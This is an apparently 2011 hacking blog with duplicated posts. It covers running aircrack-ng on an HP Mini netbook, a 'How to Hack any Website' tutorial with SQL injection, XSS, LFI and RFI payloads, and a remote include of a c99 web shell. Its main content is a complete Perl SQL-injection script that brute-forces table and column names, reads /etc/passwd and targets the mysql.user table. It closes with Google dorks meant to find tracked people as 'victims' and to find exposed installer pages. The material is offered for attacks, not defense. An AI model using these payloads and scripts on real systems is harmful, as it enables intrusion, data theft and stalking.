Lucid is part of Ubuntu and Ubuntu is part of Debian.
So you figure out how it works.
any ways this is all I got so far with my lucid.
(""" all the software will work with hp mini 210 """)
http://packages.ubuntu.com/lucid/
you can get aircrack-ng, wireshark, and etc here good luck.
Tuesday, June 21, 2011
Using Puppy Linux and HP Mini 210.
This combination of software and hardware are almost perfect for hacking, but that requires some sacrifices:lacks no sound, typing, mouse gestures and no support with extra hardware (e.g. wireless key button, sound key button)
It supports many utilities basically if any software is supported in Lucid(Ubuntu> Debian), then it will work.
Backtrack 4 will not support broadcom 43x drivers at all, but puppy linux will support everything that is possible with BC43x chipsets backtrack4 supports sound and just scroll gestures on the touchpad, but it does not support portability.
It supports many utilities basically if any software is supported in Lucid(Ubuntu> Debian), then it will work.
Backtrack 4 will not support broadcom 43x drivers at all, but puppy linux will support everything that is possible with BC43x chipsets backtrack4 supports sound and just scroll gestures on the touchpad, but it does not support portability.
Monday, June 20, 2011
Running aircrack-ng suite natively on HP-Mini 210-1000
This guide will guide you how to make aircrack-ng suite work with hp-mini 210-1000 Broadcom 4312 to work with aircrack-ng.
Requirements:
FlashDrive (more than 2 GB)
Windows (Already comes with HP mini)
1.) Get YUMI (Win32)
2.) On YUMI, look for Puppy Linux and download.
3.) Create the Live on the USB with YUMI
4.) Make sure your HPMINI BIOS boots USB as the first device.
5.) Boot up Puppy Linux
6.) Select wlan0 (because it supports broadcom :D)
7.) Get any web browser
8.) Download file from http://www.murga-linux.com/puppy/viewtopic.php?t=60202
9.) Read more about aircrack-ng suite
So, thats how you get aircrack-ng to work with hp-mini210 - 1000
it proves that hp-mini is an hacker tool.
Requirements:
FlashDrive (more than 2 GB)
Windows (Already comes with HP mini)
1.) Get YUMI (Win32)
2.) On YUMI, look for Puppy Linux and download.
3.) Create the Live on the USB with YUMI
4.) Make sure your HPMINI BIOS boots USB as the first device.
5.) Boot up Puppy Linux
6.) Select wlan0 (because it supports broadcom :D)
7.) Get any web browser
8.) Download file from http://www.murga-linux.com/puppy/viewtopic.php?t=60202
9.) Read more about aircrack-ng suite
So, thats how you get aircrack-ng to work with hp-mini210 - 1000
it proves that hp-mini is an hacker tool.
Friday, June 17, 2011
How to Hack any Website.
This tutorial was made by Hini Aes, dedecatied to Soumyodeep on facebook.
Introduction:
All computer networks are not 100% secure peroid, but some networks are secure enough from an hacker firstly my topic is about hacking websites so first you want to know what is an exploit in my terms so you will under stand.
Exploit: The weak section of an website. With an exploit you can hack any computer system with exploit sometimes an exploit might seem to be limited, but it can be your adventage of something else maybe but html trojan/or virus.
Terms:
Deface: to replace code or file of the orginal index page.
SQL Injection/SQLi: en.wikipedia.org/wiki/SQL_injection
XSS: en.wikipedia.org/wiki/Cross-site_scripting
LFI/RFI: http://www.scribd.com/doc/6498408/Remote-and-Local-File-Inclusion-Explained
SQL Injection Example:
www.sql.com/index.php?id=1'
if you get in error in the browser let "error in your MySQL syntax"
so by putting ' after a .php?value=# and you get error.
then site if vulerable to an SQL Injection.
XSS (Cross Site Scripting):
www.xsssite.com/search.php?query=<h1>this site is vulnerable to xss </h1>
Remote & Local File Inclusion.
RFI Exploit.
www.northkoreans.com/index.php?include=http://www.haxorz.com/c99.txt
by using the parametor include=(http://www.haxorz.com/c99.txt
the page file include c99.txt from haxorz.com but if you use .php shell then it will appear on the haxorz.com but its in .txt form then it will load contents from northkoreans.com.
LFI
www.lfime.com/index.php?id=../../../../../../etc/pwd
you have to search about that sorry.
register on www.hackforums.net and read tutorials and do them then you will be come an website hacker.
Introduction:
All computer networks are not 100% secure peroid, but some networks are secure enough from an hacker firstly my topic is about hacking websites so first you want to know what is an exploit in my terms so you will under stand.
Exploit: The weak section of an website. With an exploit you can hack any computer system with exploit sometimes an exploit might seem to be limited, but it can be your adventage of something else maybe but html trojan/or virus.
Terms:
Deface: to replace code or file of the orginal index page.
SQL Injection/SQLi: en.wikipedia.org/wiki/SQL_injection
XSS: en.wikipedia.org/wiki/Cross-site_scripting
LFI/RFI: http://www.scribd.com/doc/6498408/Remote-and-Local-File-Inclusion-Explained
SQL Injection Example:
www.sql.com/index.php?id=1'
if you get in error in the browser let "error in your MySQL syntax"
so by putting ' after a .php?value=# and you get error.
then site if vulerable to an SQL Injection.
XSS (Cross Site Scripting):
www.xsssite.com/search.php?query=<h1>this site is vulnerable to xss </h1>
Remote & Local File Inclusion.
RFI Exploit.
www.northkoreans.com/index.php?include=http://www.haxorz.com/c99.txt
by using the parametor include=(http://www.haxorz.com/c99.txt
the page file include c99.txt from haxorz.com but if you use .php shell then it will appear on the haxorz.com but its in .txt form then it will load contents from northkoreans.com.
LFI
www.lfime.com/index.php?id=../../../../../../etc/pwd
you have to search about that sorry.
register on www.hackforums.net and read tutorials and do them then you will be come an website hacker.
Thursday, June 16, 2011
Best Online Hacking Tools
http://killer.blackapplehost.com/
goto it has some nice hacking stuff there,
goto it has some nice hacking stuff there,
Tuesday, June 14, 2011
Automatic SQL Injection with Brute Force [Perl Script]
The good thing about this script that it is multiplatform and its an auto injection tool so it makes the process faster but i will not always work agaist from an manual sql injection
Requirements:
Perl
Code:
Requirements:
Perl
Code:
#!/usr/bin/perl
###########################################################################################
# -[+]- SQL-PwnZ v1.1 | By Login-Root -[+]- ###
###########################################################################################
###########################################################################################
# [+] inf0: ###
###########################################################################################
# It Searchs: ###
# =========== ###
# - NÂș of columns ###
# - Information_Schema && MySQL.User ###
# - LOAD_FILE ###
# - Tables ###
# - Columns ###
# ###
# ...and save it on a nice text file. ###
# ###
###########################################################################################
###########################################################################################
# [+] Use: ###
###########################################################################################
# perl sqlpwnz.pl [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK] ###
# [WEBSITE]: http://www.web.com/index.php?id= ###
# [COLUMNS]: Limit of columns to check ###
# [FILE]: File where save the results ###
# [COMMENT]: '/*' or '--' (Without '') (Optional) ###
# [-T]: Try to brute force tables (Optional) ###
# [-C]: Try to brute force columns (Optional) ###
# [-NOCHECK]: Skip the initial check (Optional) ###
###########################################################################################
###########################################################################################
# [+] c0ntact: ###
###########################################################################################
# MSN: no.more@passport.com ###
# Jabber: login-root@x23.eu ###
# E-Mail: login_root@yahoo.com.ar ###
# ###
###########################################################################################
###########################################################################################
# [+] sh0utz: ###
###########################################################################################
# In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion ###
# Many thanks to boER, who teach me a little of perl ;D ###
# VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM ###
###########################################################################################
###########################################################################################
# ARGENTINA PRODUCT :) ###
###########################################################################################
use LWP::Simple;
if(!$ARGV[2])
{
print "\n\n-[+]- SQL-PwnZ v1.1 | By Login-Root -[+]-\n=========================================";
print "\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";
print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '') (Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n";
exit (0);
}
@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table',
'miembro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass',
'tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email',
'user_emails','user_mail','user_mails','mail','emails','email','address',
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','contrasena','auth','key','senha',
'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
'membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
'associated','accnt','customers','customer','membres','administrateur','utilisateur',
'tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
@nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
if ( $ARGV[0] !~ /^http:/ )
{
$ARGV[0] = "http://" . $ARGV[0];
}
if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--")
{
$cmn.= "+";
$cfin.="--";
print "\n[+] Comments to use: '--' & '+'";
}
else
{
$cmn.= "/**/";
$cfin.= "/*";
print "\n[+] Comments to use: '/*' & '/**/'";
}
open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";
if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK")
{
print "\n[!] Skipping the initial check...\n";
print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
}
else
{
print "\n[!] Checking if the website is vulnerable...\n";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin;
$response=get($sql)or die("[-] Wrong Website, check it\n");
if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/)
{
print "[+] Vulnerable website, script continues...\n";
print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
}
else
{
print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n";
exit(1);
}
}
print "\n[!] Looking up columns...\n";
for ($column = 0 ; $column < $ARGV[1] ; $column ++)
{
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
{
print WEB "\n[COLUMNS]:\n\n";
$inyection = '';
$union = '';
}
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
$response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n");
if($response =~ /loginpwnz/)
{
$column ++;
print "[+] The site has $column columns\n\n";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
print "$sql\n";
print WEB "$sql\n";
print "\n[!] Checking if Information_Schema exists...";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql)or die("[-] Impossible to get Information_Schema\n");
if($response =~ /loginpwnz/)
{
print "\n[+] Information_Schema available...saving in $ARGV[2]";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
}
else
{
print "\n[-] Information_Schema unavailable";
}
print "\n[!] Checking if MySQL.User exists...";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
{
print "\n[+] MySQL.User available...saving in $ARGV[2]";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
}
else
{
print "\n[-] MySQL.User unavailable";
}
while ($loadcont < $column-1)
{
$loadfile.=','.'load_file(0x2f6574632f706173737764)';
$loadcont++;
}
print "\n[!] Checking if it is possible to inject LOAD_FILE...";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
$response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");
if($response =~ /root:x:/)
{
print "\n[+] LOAD_FILE available...saving in $ARGV[2]";
print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";
}
else
{
print "\n[-] LOAD_FILE unavailable";
}
if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T")
{
print "\n\n[!] Brute forcing tables...";
print WEB "\n\n[TABLES]:\n\n";
foreach $tabla(@nombretabla)
{
chomp($tabla);
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to get tables\n");
if($response =~ /loginpwnz/)
{
print "\n[+] Table $tabla exists...saving in $ARGV[2]";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
print WEB "$sql\n";
}
}
}
if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C")
{
print "\n\n[!] Table to brute force columns: ";
$tabla.=<STDIN>;
chomp($tabla);
print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n";
foreach $columna(@nombrecolumna)
{
chomp($columna);
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to get columns\n");
if ($response =~ /loginpwnz/)
{
print "\n[+] Column $columna available...saving in $ARGV[2]";
print WEB "$columna\n";
}
}
}
print WEB "\n\n\n[*EOF*]";
print "\n\n[+] Everything saved correctly in $ARGV[2]\n\n";
print "## c0ded by Login-Root | 2008 ##\n\n";
exit (0);
}
}
print "[-] Impossible to find number of columns, try more columns\n\n";
print "## c0ded by Login-Root | 2008 ##\n\n";
exit (0);
Monday, June 13, 2011
important information [dork]
Site: google.com/latitude - This is a free application where you can track
your PC, laptop and mobile, just login there and you will be tracked
freely(used to track yourself live and you can put this in blogs to show
where you are)
I made a dork simply that shows some couple of people, after some years when
this application will grow stronger and you can get tons of victims.
*allinurl:http://www.google.co.in/latitude/apps/badge/api?user=*
By *The ALLSTAR*
your PC, laptop and mobile, just login there and you will be tracked
freely(used to track yourself live and you can put this in blogs to show
where you are)
I made a dork simply that shows some couple of people, after some years when
this application will grow stronger and you can get tons of victims.
*allinurl:http://www.google.co.in/latitude/apps/badge/api?user=*
By *The ALLSTAR*
Sensative file [dork] ionCub
This dork views sensative information that may be used for hacking.
dork: inurl:loader-wizard ext:php
*www.google.com*
dork: inurl:loader-wizard ext:php
*www.google.com*
[Dork] More Accurute vBulletin installion finder [Dork]
inurl:/install/install.php intitle:vBulletin * Install System
use this with an google based search engine (www.google.com)
use this with an google based search engine (www.google.com)
Subscribe to:
Posts (Atom)